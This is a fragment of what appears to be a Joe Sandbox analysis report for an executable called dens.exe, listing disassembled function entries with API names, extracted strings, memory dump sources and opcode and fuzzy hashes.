                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                              • API String ID: 3510742995-2916047017
                                                                                                                                                                                                                                              • Opcode ID: 0d48976400f3644fb356e5695879e07cc8939a55f0091d8d278dd832f5afb60d
                                                                                                                                                                                                                                              • Instruction ID: c322204ae831d13334e4d8bd7ecc73828d4e9d3aa00ea14c673faf252414412f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d48976400f3644fb356e5695879e07cc8939a55f0091d8d278dd832f5afb60d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD51D172B1825285EB688A65F074F382BA0FB14BA4F8546B1C93E473C8CFADF4818700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2162964266-3727861699
                                                                                                                                                                                                                                              • Opcode ID: b41f21bbc434ec6d1de5086e02495e52cde0cfce1eb061fb3c9577bcc6dba8bb
                                                                                                                                                                                                                                              • Instruction ID: a54527cff0fbb88446ca67791b42761d5123100eb2bb256083a02274717f77b9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b41f21bbc434ec6d1de5086e02495e52cde0cfce1eb061fb3c9577bcc6dba8bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C519A36708BC186E7648F55F4106AEB7A5FB88B88F944472DA9D43BA9CF3CE455C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: $%!.15g$-
                                                                                                                                                                                                                                              • API String ID: 3510742995-875264902
                                                                                                                                                                                                                                              • Opcode ID: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
                                                                                                                                                                                                                                              • Instruction ID: dcfe49e8527574a043cb28974e06de20347eb29d588a46be227043e4313edcd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87412962B1D78587E718CB3EE061BAA7BA0EB497C4F404175EA9D4779ACB3CD405C710
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              • Opcode ID: a07785a57d89a6b6b2cd6742ff57c5158af552e3cd36b9dced591b1559e342f0
                                                                                                                                                                                                                                              • Instruction ID: 8c5eb92b5fb8db15ab249128e526d9ba67136670ee662d2dc95a57e6a127f5f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a07785a57d89a6b6b2cd6742ff57c5158af552e3cd36b9dced591b1559e342f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E31EC376092C18AD308CF7AD06087D7BA1E744B48F048176DFA94B399EB3CE565C720
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2221118986-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 5e863916525a9204ac9d6aa5207d54266211b4af8f85feab029ec6656853ced4
                                                                                                                                                                                                                                              • Instruction ID: cd174483fd119a2b5267e2358b84e1e11ea7a926b8241ac542c1d60538172bb4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e863916525a9204ac9d6aa5207d54266211b4af8f85feab029ec6656853ced4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D31C77671864182D7549F69E460ABA73A1FB89B80F844135FE5E4BBD8DF3CD5028740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction ID: 676343a545536e242cd7a8e561d9ca1aa7b8748dc7a10c2edd1c8ccda047082e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11E931A0C14246FE54876EED492B95251FB9CBA0F448030DF4987B9ACE2ED8D18249
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: cae572169cced5dd2f19bce54058c80e5087122ed076c55999fdcdab2a4b6806
                                                                                                                                                                                                                                              • Instruction ID: 26a560878779db407b1c4a4a82dd7d64915a8a4268acb82be9ab392d28736531
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cae572169cced5dd2f19bce54058c80e5087122ed076c55999fdcdab2a4b6806
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE112A2AB15F058AEB00CF61E8646BC33A4FB19758F440E35DA7D467A8DF78E1948340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction ID: 27bcf5ecab6bf9a5291cc3095efea6fbea17842a2d565b7d9bd1a9f0b23468ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0112E26B14F058AEF00CF64EC592B933A4FB59768F440E31DA6D86BA4DF7CE1598341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                              • Instruction ID: f664fdee7d1239c3abcf8ac18af72a5ae165a768b23256e454d126aaa1e715a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63112126B14F028DFB44CF60E8646B933A4F719758F441D71DA6D467A8DF78D1598340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067701884.00007FFDFA2C1000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFDFA2C0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067625155.00007FFDFA2C0000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068354571.00007FFDFA9ED000.00000004.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068388781.00007FFDFA9FB000.00000008.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068427667.00007FFDFA9FC000.00000004.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068462134.00007FFDFAA00000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfa2c0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                              • Instruction ID: 2486c02cc8e9d65dfbdccfb5e27d33d33ca7b70e5a8791481564724c14c5364a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E113326B14F018AFB04CF60E8646B833B4F719758F440E31EA7D867A8DF78D5548380
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                              • Instruction ID: e16b7157366fe57095c0bb03f24a9810d1c99c74d3f40d8e6cdd428172d177c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA412712A0868246FF609B29DC4B37A6761EBA0BB4F144235EE5C87BD5DFBCD4418702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C109046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62C0FCBA5), ref: 00007FF62C109064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-1397442068
                                                                                                                                                                                                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction ID: be9582ce97e79338b5047bd0e071fd5532c7b29ea535b0458c94f7403486979f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22418D32A08A4285EF15AF25AC5A0BD63A4EF557F4F554035ED4E87B8ADE3CE4A1C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: 8f17ead97d17a737c931a5056be74890f61cb4d4399002a299bd428731deaf78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA41E532B18A8185DB20CF29E8593AA6760FB987A4F444131EE4DC7784EF3CD455CB42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction ID: 985ab0652be958d71ff8548b852eba62ebf5bbecd17fd7d44c1f58a28d9b6dfd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6213162B0868181EF208B15D84A22D73B1FB88B94F864035DE8C83684DF7DE9968B42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: ee375455ade081ab3cff36d53b82a03997399dda6a45a8be90c705f646def659
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B115E32608B8182EF218F19E84025977E5FB88B94F184234DF8D47754DF7DD591C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
